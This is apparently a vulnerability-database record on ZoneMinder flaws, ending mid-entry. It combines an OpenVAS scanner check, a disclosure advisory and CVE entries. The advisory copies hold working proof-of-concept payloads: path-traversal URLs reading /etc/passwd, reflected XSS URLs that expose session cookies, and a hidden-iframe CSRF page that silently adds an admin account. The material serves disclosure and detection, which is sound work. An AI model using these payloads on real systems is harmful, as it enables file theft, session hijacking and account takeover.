{"id": "OPENVAS:1361412562310106564", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "ZoneMinder Multiple Vulnerabilities", "description": "ZoneMinder is prone to multiple vulnerabilities.", "published": "2017-02-06T00:00:00", "modified": "2020-05-08T00:00:00", "epss": [{"cve": "CVE-2017-5368", "epss": 0.00725, "percentile": 0.78504, "modified": "2023-11-24"}, {"cve": "CVE-2017-5367", "epss": 0.00162, "percentile": 0.52825, "modified": "2023-11-24"}, {"cve": "CVE-2017-5595", "epss": 0.00055, "percentile": 0.21177, "modified": "2023-11-24"}], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106564", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["http://seclists.org/fulldisclosure/2017/Feb/11"], "cvelist": ["CVE-2017-5368", "CVE-2017-5367", "CVE-2017-5595"], "immutableFields": [], "lastseen": "2020-05-12T17:09:54", "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2017-5367", "ALPINE:CVE-2017-5368", "ALPINE:CVE-2017-5595"]}, {"type": "cve", "idList": ["CVE-2017-5367", "CVE-2017-5368", "CVE-2017-5595"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1145-1:650B0"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5367", "DEBIANCVE:CVE-2017-5368", "DEBIANCVE:CVE-2017-5595"]}, {"type": "fedora", "idList": ["FEDORA:8E1B06091F48", "FEDORA:D8A4C62F5477"]}, {"type": "mageia", "idList": ["MGASA-2017-0162"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1145.NASL", "FEDORA_2017-2BB174AE3C.NASL", "FEDORA_2017-D5FB74CD2E.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310872361", "OPENVAS:1361412562310872364", "OPENVAS:1361412562310891145"]}, {"type": "osv", "idList": ["OSV:DLA-1145-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140927"]}, {"type": "prion", "idList": ["PRION:CVE-2017-5367", "PRION:CVE-2017-5368", "PRION:CVE-2017-5595"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5367", "UB:CVE-2017-5368", "UB:CVE-2017-5595"]}, {"type": "zdt", "idList": ["1337DAY-ID-26901"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2017-5367", "CVE-2017-5368", "CVE-2017-5595"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1145-1:650B0"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5367", "DEBIANCVE:CVE-2017-5368", "DEBIANCVE:CVE-2017-5595"]}, {"type": "fedora", "idList": ["FEDORA:8E1B06091F48", "FEDORA:D8A4C62F5477"]}, {"type": "nessus", "idList": ["FEDORA_2017-2BB174AE3C.NASL", "FEDORA_2017-D5FB74CD2E.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310872361", "OPENVAS:1361412562310872364"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140927"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5367", "UB:CVE-2017-5368", "UB:CVE-2017-5595"]}, {"type": "zdt", "idList": ["1337DAY-ID-26901"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-5368", "epss": "0.007250000", "percentile": "0.776690000", "modified": "2023-03-15"}, {"cve": "CVE-2017-5367", "epss": "0.001620000", "percentile": "0.511240000", "modified": "2023-03-15"}, {"cve": "CVE-2017-5595", "epss": "0.000550000", "percentile": "0.209420000", "modified": "2023-03-15"}], "vulnersScore": 0.1}, "_state": {"dependencies": 1700858913, "score": 1700859493, "epss": 0}, "_internal": {"score_hash": "95e6c0ce67f52f62d5abde9aa5c533b6"}, "pluginID": "1361412562310106564", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ZoneMinder Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zoneminder:zoneminder\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106564\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-06 09:54:32 +0700 (Mon, 06 Feb 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-5595\", \"CVE-2017-5367\", \"CVE-2017-5368\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"ZoneMinder Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_zoneminder_detect.nasl\", \"os_detection.nasl\");\n script_require_keys(\"Host/runs_unixoide\");\n script_mandatory_keys(\"zoneminder/installed\");\n\n script_tag(name:\"summary\", value:\"ZoneMinder is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to read the /etc/passwd file.\");\n\n script_tag(name:\"insight\", value:\"ZoneMinder is prone to multiple vulnerabilities:\n\n - File disclosure and inclusion vulnerability exists due to unfiltered user-input being passed to readfile() in\n views/file.php which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the\n context of the web server user (www-data). (CVE-2017-5595)\n\n - Multiple reflected XSS (CVE-2017-5367)\n\n - CSRF vulnerability since no CSRF protection exists across the entire web app. (CVE-2017-5368)\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated remote attacker may read arbitrary files.\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.30.2 or later.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2017/Feb/11\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nfiles = traversal_files(\"linux\");\n\nforeach pattern(keys(files)) {\n\n file = files[pattern];\n\n url = dir + \"/index.php?view=file&path=/../../../../../\" + file;\n\n if (http_vuln_check(port: port, url: url, pattern: pattern, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}
{"packetstorm": [{"lastseen": "2017-02-08T05:04:31", "description": "", "cvss3": {}, "published": "2017-02-06T00:00:00", "type": "packetstorm", "title": "ZoneMinder XSS / CSRF / File Disclosure / Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5368", "CVE-2016-10140", "CVE-2017-5367", "CVE-2017-5595"], "modified": "2017-02-06T00:00:00", "id": "PACKETSTORM:140927", "href": "https://packetstormsecurity.com/files/140927/ZoneMinder-XSS-CSRF-File-Disclosure-Authentication-Bypass.html", "sourceData": "`========================================================================== \nProduct: ZoneMinder \nVersions: Multiple versions - see inline \nVulnerabilities: File disclosure, XSS, CSRF, Auth bypass & Info disclosure \nCVE-IDs: CVE-2017-5595, CVE-2017-5367, CVE-2017-5368, CVE-2016-10140 \nAuthor: John Marzella \nDate: 03/02/2017 \n========================================================================== \n \n \n \nCVE-2016-10140 - Auth bypass and Info disclosure - affects v1.30 and v1.29 \n========================================================================== \nContacted vendor on 08/11/2016 \n \nApache HTTP Server configuration bundled with ZoneMinder allows a remote unauthenticated attacker to browse all directories \nin the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server. \n \nPoC: http://<serverIP>/events \n \nFix: https://github.com/ZoneMinder/ZoneMinder/commit/71898df7565ed2a51dfe76a1cf30ddb81fc888ba \n \n \n \nCVE-2017-5595 - File disclosure - affects v1.xx - code from 2008 \n================================================================ \nContacted vendor on 22/01/2017 \n \nFile disclosure and inclusion vulnerability exists in ZoneMinder v1.30.0 due to unfiltered user-input being passed to readfile() in views/file.php which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the context of the web server user (www-data). \n \nPoC: http://<serverIP>/zm/index.php?view=file&path=/../../../../../etc/passwd \n \nFix: https://github.com/ZoneMinder/ZoneMinder/commit/8b19fca9927cdec07cc9dd09bdcf2496a5ae69b3 \n \n \n \nCVE-2017-5367 - XSS - affects v1.30 and v1.29 \n============================================= \nContacted vendor on 20/11/2016 \n \nMultiple reflected XSS exists. \n \nThe following has been injected into vulnerable URLas to show that the users session cookie can be stolen. \n%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn form input view using POST at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/index.php?action=login&view=postlogin%3Cscript%3Ealert(document.cookie);%3C/script%3E&postLoginQuery=1&username=testuser&password=testpassword \n \nIn link input view using GET at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn link input filter[terms][1][cnj] using GET at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bhour&filter[terms][1][cnj]=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter[terms][1][attr]=MonitorId&filter[terms][1][op]=%3D&filter[terms][1][val]=1 \n \nIn form input view using GET at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=console%3Cscript%3Ealert(document.cookie);%3C/script%3E&action=1&addBtn=Add%20New%20Monitor&editBtn=Edit&deleteBtn=Delete&markMids[]=2 \n \nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B1%5D%5Bval%5D=1 \n \nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1+hour&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=%3Cscript%3Ealert(document.cookie);%3C/script%3Eand&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D==&filter%5Bterms%5D%5B1%5D%5Bval%5D=1 \n \nIn form input limit using POST at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=events&action=1&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bmonth&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn link input limit using GET at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3E%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1%2Bmonth&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn form input limit using POST at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&action=1&page=1&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn link input limit using GET at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \n \n \nCVE-2017-5368 - CSRF - affects v1.30 and v1.29 \n============================================== \nContacted vendor on 20/11/2016 \n \nNo CSRF protection exists across entire web app. \n \nPoC: The following html page silently adds a new admin user to Zoneminder if the admin user is already logged in. \n \ncsrf_poc_addUser.html \n \n<!-- Example of silent CSRF using iframe --> \n<iframe style=\"display:none\" name=\"csrf-frame\"></iframe> \n<form method='POST' action=\"http://<serverIP>/zm/index.php\" target=\"csrf-frame\" id=\"csrf-form\"> \n<input type=\"hidden\" name=\"view\" value=\"user\"/> \n<input type=\"hidden\" name=\"action\" value=\"user\"/> \n<input type=\"hidden\" name=\"uid\" value=\"0\"/> \n<input type=\"hidden\" name=\"newUser[MonitorIds]\" value=\"\"/> \n<input type=\"hidden\" name=\"newUser[Username]\" value=\"attacker1\"/> \n<input type=\"hidden\" name=\"newUser[Password]\" value=\"Password1234\"/> \n<input type=\"hidden\" name=\"conf_password\" value=\"Password1234\"/> \n<input type=\"hidden\" name=\"newUser[Language]\" value=\"en_gb\"/> \n<input type=\"hidden\" name=\"newUser[Enabled]\" value=\"1\"/> \n<input type=\"hidden\" name=\"newUser[Stream]\" value=\"View\"/> \n<input type=\"hidden\" name=\"newUser[Events]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[Control]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[Monitors]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[Groups]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[System]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[MaxBandwidth]\" value=\"high\"/> \n</form> \n<script>document.getElementById(\"csrf-form\").submit()</script> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/140927/zoneminder_03022017.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-04T23:35:20", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2017-02-05T00:00:00", "type": "zdt", "title": "ZoneMinder - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5368", "CVE-2016-10140", "CVE-2017-5367", "CVE-2017-5595"], "modified": "2017-02-05T00:00:00", "id": "1337DAY-ID-26901", "href": "https://0day.today/exploit/description/26901", "sourceData": "==========================================================================\r\nProduct: ZoneMinder\r\nVersions: Multiple versions - see inline\r\nVulnerabilities: File disclosure, XSS, CSRF, Auth bypass & Info disclosure\r\nCVE-IDs: CVE-2017-5595, CVE-2017-5367, CVE-2017-5368, CVE-2016-10140\r\nAuthor: John Marzella\r\nDate: 03/02/2017\r\n==========================================================================\r\n\r\n\r\n\r\nCVE-2016-10140 - Auth bypass and Info disclosure - affects v1.30 and v1.29\r\n==========================================================================\r\nContacted vendor on 08/11/2016\r\n\r\nApache HTTP Server configuration bundled with ZoneMinder allows a remote unauthenticated attacker to browse all directories in the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server.\r\n\r\nPoC: http://<serverIP>/events\r\n\r\nFix: https://github.com/ZoneMinder/ZoneMinder/commit/71898df7565ed2a51dfe76a1cf30ddb81fc888ba\r\n\r\n\r\n\r\nCVE-2017-5595 - File disclosure - affects v1.xx - code from 2008\r\n================================================================\r\nContacted vendor on 22/01/2017\r\n\r\nFile disclosure and inclusion vulnerability exists in ZoneMinder v1.30.0 due to unfiltered user-input being passed to readfile() in views/file.php which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the context of the web server user (www-data).\r\n\r\nPoC: http://<serverIP>/zm/index.php?view=file&path=/../../../../../etc/passwd\r\n\r\nFix: https://github.com/ZoneMinder/ZoneMinder/commit/8b19fca9927cdec07cc9dd09bdcf2496a5ae69b3\r\n\r\n\r\n\r\nCVE-2017-5367 - XSS - affects v1.30 and v1.29\r\n=============================================\r\nContacted vendor on 20/11/2016\r\n\r\nMultiple reflected XSS exists.\r\n\r\nThe following has been injected into vulnerable URL\u2019s to show that the users session cookie can be stolen.\r\n%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn form input view using POST at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/index.php?action=login&view=postlogin%3Cscript%3Ealert(document.cookie);%3C/script%3E&postLoginQuery=1&username=testuser&password=testpassword\r\n\r\nIn link input view using GET at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn link input filter[terms][1][cnj] using GET at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bhour&filter[terms][1][cnj]=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter[terms][1][attr]=MonitorId&filter[terms][1][op]=%3D&filter[terms][1][val]=1\r\n\r\nIn form input view using GET at http://<serverIP>/zm/index.php\r\nPoC: http://<serverIP>/zm/index.php?view=console%3Cscript%3Ealert(document.cookie);%3C/script%3E&action=1&addBtn=Add%20New%20Monitor&editBtn=Edit&deleteBtn=Delete&markMids[]=2\r\n\r\nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/index.php PoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B1%5D%5Bval%5D=1\r\n\r\nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1+hour&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=%3Cscript%3Ealert(document.cookie);%3C/script%3Eand&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D==&filter%5Bterms%5D%5B1%5D%5Bval%5D=1\r\n\r\nIn form input limit using POST at http://<serverIP>/zm/index.php\r\nPoC: http://<serverIP>/zm/index.php?view=events&action=1&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bmonth&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn link input limit using GET at http://<serverIP>/zm/index.php\r\nPoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3E%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1%2Bmonth&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn form input limit using POST at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&action=1&page=1&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn link input limit using GET at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\n\r\n\r\nCVE-2017-5368 - CSRF - affects v1.30 and v1.29\r\n==============================================\r\nContacted vendor on 20/11/2016\r\n\r\nNo CSRF protection exists across entire web app.\r\n\r\nPoC: The following html page silently adds a new admin user to Zoneminder if the admin user is already logged in.\r\n\r\ncsrf_poc_addUser.html\r\n\r\n<!-- Example of silent CSRF using iframe -->\r\n<iframe style=\"display:none\" name=\"csrf-frame\"></iframe>\r\n<form method='POST' action=\"http://<serverIP>/zm/index.php\" target=\"csrf-frame\" id=\"csrf-form\">\r\n<input type=\"hidden\" name=\"view\" value=\"user\"/>\r\n<input type=\"hidden\" name=\"action\" value=\"user\"/>\r\n<input type=\"hidden\" name=\"uid\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"newUser[MonitorIds]\" value=\"\"/>\r\n<input type=\"hidden\" name=\"newUser[Username]\" value=\"attacker1\"/>\r\n<input type=\"hidden\" name=\"newUser[Password]\" value=\"Password1234\"/>\r\n<input type=\"hidden\" name=\"conf_password\" value=\"Password1234\"/>\r\n<input type=\"hidden\" name=\"newUser[Language]\" value=\"en_gb\"/>\r\n<input type=\"hidden\" name=\"newUser[Enabled]\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"newUser[Stream]\" value=\"View\"/>\r\n<input type=\"hidden\" name=\"newUser[Events]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[Control]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[Monitors]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[Groups]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[System]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[MaxBandwidth]\" value=\"high\"/>\r\n</form>\r\n<script>document.getElementById(\"csrf-form\").submit()</script>\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/26901", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntucve": [{"lastseen": "2023-12-03T14:45:36", "description": "ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, is\nvulnerable to CSRF (Cross Site Request Forgery) which allows a remote\nattack to make changes to the web application as the current logged in\nvictim. If the victim visits a malicious web page, the attacker can\nsilently and automatically create a new admin user within the web\napplication for remote persistence and further attacks. The URL is\n/zm/index.php and sample parameters could include action=user uid=0\nnewUser[Username]=attacker1 newUser[Password]=Password1234\nconf_password=Password1234 newUser[System]=Edit (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-02-06T00:00:00", "type": "ubuntucve", "title": "CVE-2017-5368", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5368"], "modified": "2017-02-06T00:00:00", "id": "UB:CVE-2017-5368", "href": "https://ubuntu.com/security/CVE-2017-5368", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T14:45:35", "description": "Multiple reflected XSS vulnerabilities exist within form and link input\nparameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web\napplication, which allows a remote attacker to execute malicious scripts\nwithin an authenticated client's browser. The URL is /zm/index.php and\nsample parameters could include action=login&view=postlogin[XSS]\nview=console[XSS] view=groups[XSS]\nview=events&filter[terms][1][cnj]=and[XSS]\nview=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS]\nview=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and\nview=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T00:00:00", "type": "ubuntucve", "title": "CVE-2017-5367", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-06T00:00:00", "id": "UB:CVE-2017-5367", "href": "https://ubuntu.com/security/CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-03T14:45:36", "description": "A file disclosure and inclusion vulnerability exists in web/views/file.php\nin ZoneMinder 1.x through v1.30.0 because of unfiltered user-input being\npassed to readfile(), which allows an authenticated attacker to read local\nsystem files (e.g., /etc/passwd) in the context of the web server user\n(www-data). The attack vector is a .. (dot dot) in the path parameter\nwithin a zm/index.php?view=file&path= request.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1419507>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-06T00:00:00", "type": "ubuntucve", "title": "CVE-2017-5595", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5595"], "modified": "2017-02-06T00:00:00", "id": "UB:CVE-2017-5595", "href": "https://ubuntu.com/security/CVE-2017-5595", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2023-12-03T18:32:05", "description": "Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T17:59:00", "type": "debiancve", "title": "CVE-2017-5367", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 